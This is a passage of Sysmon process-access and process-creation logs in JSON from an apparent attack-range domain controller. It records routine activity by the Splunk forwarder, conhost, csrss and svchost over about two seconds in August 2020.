{"EventTime":"2020-08-01 05:50:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4094,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:51.586\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-02BB-5F25-0000-0010400D0600}\r\nTargetProcessId: 3896\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:51.586","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-02BB-5F25-0000-0010400D0600}","TargetProcessId":"3896","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4095,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:52.946\r\nProcessGuid: {A837DB8D-02BC-5F25-0000-0010680F0600}\r\nProcessId: 4692\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:50:52.946","ProcessGuid":"{A837DB8D-02BC-5F25-0000-0010680F0600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:50:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4096,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:52.946\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-02BC-5F25-0000-0010680F0600}\r\nTargetProcessId: 4692\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:52.946","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-02BC-5F25-0000-0010680F0600}","TargetProcessId":"4692","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4097,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:52.946\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-02BC-5F25-0000-0010680F0600}\r\nTargetProcessId: 4692\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:52.946","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-02BC-5F25-0000-0010680F0600}","TargetProcessId":"4692","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:50:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4098,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:52.946\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:52.946","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4099,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:52.946\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:52.946","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4100,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:52.946\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:52.946","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4101,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:52.946\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:52.946","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4102,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:52.946\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 